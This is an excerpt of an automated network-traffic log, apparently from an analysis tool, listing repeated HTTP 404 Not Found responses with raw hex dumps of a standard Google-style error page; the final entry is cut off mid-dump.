                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:16:20 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:16:21 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:16:22 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:16:23 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:16:24 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:16:25 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:16:27 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 